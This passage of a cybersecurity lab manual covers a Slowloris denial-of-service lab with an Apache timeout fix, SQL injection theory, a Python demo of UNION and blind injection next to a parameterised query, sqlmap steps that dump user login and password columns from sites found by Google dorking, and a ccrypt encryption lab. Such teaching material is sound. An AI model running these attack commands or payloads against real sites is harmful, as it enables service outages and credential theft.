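        conn.sendall(RESPONSE_200 if read_headers(conn) is not None else RESPONSE_408)
    except OSError:
        pass
    finally:
        conn.close()
        if slots is not None:
            slots.release()


class HardenedServer:
    """Threaded server with a per-connection header deadline and a worker cap;
    it starts serving on construction (port 0 lets the OS pick a free port)."""

    def __init__(self, host="127.0.0.1", port=0, max_workers=MAX_WORKERS):
        self.sock = socket.socket()
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(64)
        self.port = self.sock.getsockname()[1]
        self.slots = threading.BoundedSemaphore(max_workers)
        self._stop = threading.Event()
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def stop(self):
        self._stop.set()
        self.sock.close()

    def _accept_loop(self):
        self.sock.settimeout(0.2)
        while not self._stop.is_set():
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            # No worker freed within one deadline: refuse rather than spawn threads
            # without bound, which is how an unprotected threaded server is exhausted.
            if not self.slots.acquire(timeout=HEADER_DEADLINE):
                conn.close()
                continue
            threading.Thread(target=handle, args=(conn, self.slots), daemon=True).start()


def send_and_read(port, data, timeout=5.0):
    """Client helper: send data as-is, then collect whatever the server answers."""
    chunks = []
    with socket.create_connection(("127.0.0.1", port), timeout=timeout) as c:
        c.sendall(data)
        try:
            while chunk := c.recv(4096):
                chunks.append(chunk)
        except OSError:  # reset after the server closed: keep what already arrived
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    srv = HardenedServer()
    complete = b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n"
    stalled = b"GET / HTTP/1.1\r\nHost: localhost\r\nX-a: 1\r\n"  # blank line never sent
    print("complete ->", send_and_read(srv.port, complete).split(b"\r\n")[0])
    print("stalled  ->", send_and_read(srv.port, stalled).split(b"\r\n")[0])
    srv.stop()
```

The stalled request is answered with 408 after HEADER_DEADLINE seconds and its worker is released, whereas a server without the deadline would hold that worker for as long as the client keeps the socket open.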
Procedure:
Step1: Open Kali Linux and then open the Terminal. Create a new directory on desktop
named Slowloris and Move to that directory using the following commands.
cd Desktop
mkdir Slowloris
cd Slowloris
Step2: Now clone the Slowloris tool from GitHub into the same directory using the following
command (this repository is the one that provides slowloris.py and the -s option used below).
git clone https://github.com/gkbrk/slowloris.git
Step3: Now go to the Action bar and click on "split terminal vertically"; two terminal panes
will open side by side.
Step4: Check the IP address of the Kali machine by typing the following command in the
right-side terminal (the attack below targets this address, i.e. our own Apache server).
ifconfig
Step5: Start the Apache server with the following command in the right-side terminal.
sudo systemctl start apache2
Step6: Confirm that the server is running.
sudo systemctl status apache2
Step7: The status output shows the server as active, which means it is running properly. To
check that the tool was cloned and its files are readable, run the following commands in the
left-side terminal.
cd slowloris
ls -l
Step8: Run the tool from the left-side terminal with the following command. The -s option
sets how many sockets (connections) the tool opens and keeps alive; 500 is well above the
default MaxRequestWorkers of 150 that Debian-based Apache packages ship with.
python3 slowloris.py <our IP address> -s 500
Step9: The tool reports that it is attacking the given IP address. To check whether it is
working, open any browser and type that IP address in the URL bar: the page never arrives,
and the browser eventually shows "Problem loading page". This is how the Slowloris tool
works.
Note: The browser is stuck waiting because the server has no free worker left to answer it;
the denial-of-service attack is happening in the background through the Slowloris tool. The
tool accepts a domain name instead of an IP address, so it could be pointed at a live
website. Doing that without the owner's written permission is a crime, and we do not promote
such activity; the experiment is for educational purposes only, against our own server.
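The server-side counterpart to this lab, added here as an example and not part of the original manual: the Apache mod_reqtimeout setting that limits how long a half-sent request may occupy a worker, which is exactly what Slowloris relies on. The directive RequestReadTimeout is real; the values shown are the ones the Debian/Kali apache2 package ships in /etc/apache2/mods-available/reqtimeout.conf and should be treated as an assumption to check against your own file.

```apache
# Without mod_reqtimeout only the global Timeout applies (300 s by default),
# so one slow connection can hold a worker for five minutes at a time.
# With it, a client must finish the request header within 20 s, extended to
# at most 40 s as long as it keeps delivering 500 bytes/s; same for the body.
<IfModule reqtimeout_module>
    RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500
</IfModule>
```

Enable it with sudo a2enmod reqtimeout followed by sudo systemctl restart apache2, then rerun Step8: the tool's sockets are dropped every 20 s and it has to reconnect, so the number of workers it can hold at once falls sharply, although a large enough -s value against a small worker pool can still degrade the server.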
Viva Questions:
Lab Objectives: The objective of this lab is to help students learn how to perform a SQL
injection and extract databases.
Theory: SQL injection (SQLi) is a cyberattack that injects malicious SQL code into an
application, allowing the attacker to view or modify a database. SQL injection attacks can
have a significant negative impact on an organization. When a malicious user successfully
completes an SQL injection attack, it can have any of the following impacts:
Exposes sensitive company data: Using SQL injection, attackers can retrieve and
alter data, which risks exposing sensitive company data stored on the SQL server.
Compromise users’ privacy: Depending on the data stored on the SQL server, an
attack can expose private user data, such as credit card numbers.
Give an attacker administrative access to our system: If the database account the
application uses has administrative privileges, an attacker can run commands with those
privileges (creating users, reading files, or executing operating-system commands where the
database supports it). To limit this, create a database user with the least privileges the
application needs.
Give an attacker general access to our system: If a login check builds its SQL query from
unchecked user input, an attacker can gain access without knowing a user's credentials, for
example by turning the WHERE clause into a condition that is always true. With that access
an attacker can cause further damage by reading and manipulating sensitive information.
Compromise the integrity of our data: Using SQL injection, attackers can modify or delete
information in our system.
SQL injection attacks fall into three categories: in-band SQL injection, inferential (blind)
SQL injection and out-of-band SQL injection.
In-band SQL injection is the most common type of attack. With this type of SQL injection
attack, a malicious user uses the same communication channel for the attack and to gather
results. The following techniques are the most common types of in-band SQL injection
attacks:
Error-based SQL injection: With this technique, attackers learn about the database structure
by sending input that makes the database server raise an error and reading the message the
application returns (table and column names often appear in it). Detailed error messages are
useful while developing a web application, but they become a vulnerability once it is live.
To prevent this, show visitors a generic error page in production and keep the detailed
message in the server-side log only.
Union-based SQL injection: With this technique, attackers use the UNION SQL operator to
append the rows of a second SELECT statement (against a table of their choosing) to the
rows the application already returns, so the stolen data arrives in the normal HTTP
response. The injected SELECT must return the same number of columns, with compatible
types, as the original query, which attackers find by trial. It is the most common type of
SQL injection and, unlike error-based injection, works even when error messages are hidden.
Inferential SQL injection is also called blind SQL injection because the website database
doesn’t transfer data to the attacker like with in-band SQL injection. Instead, a malicious user
can learn about the structure of the server by sending data payloads and observing the
response. Inferential SQL injection attacks are less common than in-band SQL injection
attacks because they can take longer to complete. The two types of inferential SQL injection
attacks use the following techniques:
Boolean injection: With this technique, attackers send a SQL query to the database
and observe the result. Attackers can infer if a result is true or false based on whether
the information in the HTTP response was modified.
Time-based injection: With this technique, attackers send a SQL query to the
database, making the database wait a specific number of seconds before responding.
Attackers can determine if the result is true or false based on the number of seconds
that elapses before a response. For example, a hacker could use a SQL query that
commands a delay if the first letter of the first database’s name is A. Then, if the
response is delayed, the attacker knows the query is true.
Out-of-band SQL injection is the least common type of attack. With this type of SQL
injection attack, malicious users use a different communication channel for the attack than
they use to gather results: the injected query makes the database server itself send the
data out, for example in a DNS lookup or an HTTP request to a host the attacker controls, so
it only works when the database has such features enabled. Attackers use this method when
the server's responses are too slow or unstable for in-band or inferential injection.
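The in-band (UNION-based) and inferential (boolean-based blind) techniques described above, shown against a deliberately vulnerable query next to the parameterised query that resists both. This is an added example, not code from the lab manual or from sqlmap; the in-memory SQLite schema, its rows and the column names u_login, u_name and u_password are constructed here to mirror the lab. SQLite has no sleep() function, so the time-based variant is not shown; it works the same way with a delay as the oracle instead of a row.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        INSERT INTO products (name, price) VALUES ('Laptop', 900), ('Mouse', 15);
        CREATE TABLE users (id INTEGER PRIMARY KEY, u_login TEXT, u_name TEXT,
                            u_password TEXT);
        INSERT INTO users (u_login, u_name, u_password)
            VALUES ('admin', 'Site Admin', 'S3cret!'), ('alice', 'Alice', 'wonderland');
    """)
    return conn


def product_vulnerable(conn, product_id: str) -> list:
    """VULNERABLE: the URL parameter is pasted straight into the SQL text."""
    sql = "SELECT name, price FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()


def product_safe(conn, product_id: str) -> list:
    """Hardened: the value is bound as a parameter, so it can never become SQL."""
    sql = "SELECT name, price FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def union_attack(lookup) -> list:
    """In-band: a UNION appends rows from another table to the normal result.
    The injected SELECT must match the two columns (name, price) of the
    original query; mismatched column counts are a syntax error."""
    payload = "0 UNION SELECT u_login, u_password FROM users"
    return lookup(payload)


def blind_extract(lookup, column: str, where: str, max_len: int = 32) -> str:
    """Inferential: recover a value one character at a time using only a
    true/false oracle (did the page return a product row or not?).
    Comparing unicode(substr(...)) to a code point avoids quoting issues."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):            # printable ASCII
            payload = (f"1 AND unicode(substr((SELECT {column} FROM users "
                       f"WHERE {where}), {pos}, 1)) = {code}")
            if lookup(payload):                # a row came back: condition true
                recovered += chr(code)
                break
        else:
            break                              # nothing matched: end of string
    return recovered


if __name__ == "__main__":
    db = setup_db()
    vuln = lambda p: product_vulnerable(db, p)
    safe = lambda p: product_safe(db, p)
    print("normal :", product_vulnerable(db, "1"))
    print("union  :", union_attack(vuln))
    print("blind  :", blind_extract(vuln, "u_password", "u_login = 'admin'"))
    print("safe   :", union_attack(safe), blind_extract(safe, "u_password", "u_login = 'admin'"))
```

The blind loop is the same procedure sqlmap automates in Step 6 below, one oracle request per candidate character; the parameterised version returns no rows for every payload because the bound value is compared as data, never parsed as SQL.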
Procedure:
Step1: Open the Terminal and switch to the root user using the following command.
sudo su
Step2: Open any browser and search for candidate sites using a Google dork. Run the
following steps only against a site you own or are authorized in writing to test; sqlmap
actively sends injection payloads and can modify the target's data.
Step3: In the terminal window type sqlmap -u URL --dbs and hit enter. This enumerates the
databases on the server. (Note: Select an http site only.)
Step4: Now choose a database and list its tables. Type sqlmap -u URL -D DBName --tables
and hit enter (wait for the results).
Step5: Now list the columns of a table. Type sqlmap -u URL -D DBName -T TableName
--columns and hit enter.
Step6: To dump the contents of one or more columns type sqlmap -u URL -D DBName -T
TableName -C ColumnName --dump and hit enter (several columns can be given as a
comma-separated list). In this experiment we will retrieve the u_login, u_name and
u_password columns.
Viva Questions:
Lab Objectives: The main objective of this lab is to know how to encrypt and decrypt text
files.
Theory: Ccrypt is a command line tool for encrypting and decrypting files and streams.
Ccrypt is based on the Rijndael cipher, the same cipher adopted as the AES standard, but
where AES uses a 128-bit block size, ccrypt uses Rijndael with a 256-bit block size and a
256-bit key derived from the pass phrase. Ccrypt uses the .cpt file extension for encrypted
files.
It is a lightweight tool; installing and using it is easy.
It was designed to replace the standard Unix crypt utility, whose cipher is weak.
Ccrypt Manual:
-e, --encrypt: Encrypt. This is the default mode. If filename arguments are given,
encrypt the files and append the suffix .cpt to their names. Otherwise, run as a filter.
-d, --decrypt: Decrypt. If filename arguments are given, decrypt the files and strip the
suffix .cpt from the filenames, if present. Otherwise, run as a filter.
-c, --cat: Decrypt one or more files to standard output. If no filename arguments are
given, decrypt as a filter. Implies -l.
-x, --keychange: Change the key of encrypted data. In this mode, ccrypt prompts for
two passwords: the old one and the new one. If filename arguments are given, modify
the files. Otherwise, run as a filter.
-u, --unixcrypt: Simulate the old Unix crypt command. Note: the cipher used by Unix
crypt has been broken and is not secure. Please use this option only to decrypt existing
files. If filename arguments are given, decrypt the files to stdout. Otherwise, run as a
filter. Note that for the Unix crypt format, there is no easy way to detect whether a
given key matches or not; thus, for safety, this mode does not overwrite files.
Procedure:
Step1: Open the Terminal window in Kali Linux and install the ccrypt tool.
sudo apt-get install ccrypt
Note: If needed, update the package lists first (sudo apt-get update).
Step2: Confirm the installation and read the option summary.
ccrypt -h
Step3: Now create a text file, enter some text and read it back.
nano practice.txt (Ctrl+S to save the file and Ctrl+X to exit the editor)
cat practice.txt
Step4: To encrypt the text file, enter the following command. ccrypt prompts for the
encryption key twice (the second entry confirms the first), replaces practice.txt with
practice.txt.cpt and removes the plaintext. Type the key at the prompt rather than passing
it with -K, because a key on the command line is visible to other users in the process
list.
ccrypt -e practice.txt
Step5: Now try to read the file. It shows unreadable bytes, which means the encryption was
successful (the plaintext file no longer exists).
cat practice.txt.cpt
Step6: To decrypt the file, enter the following command and type the same key (ccrypt is a
symmetric cipher, so the encryption and decryption keys are identical). A wrong key is
rejected with "key does not match" and the file is left untouched.
ccrypt -d practice.txt.cpt
Step7: Now read the text file again; it shows the original text, which means the decryption
was successful.
cat practice.txt
Viva Questions:
1. What is encryption?
2. What is decryption?
4. What is a cipher?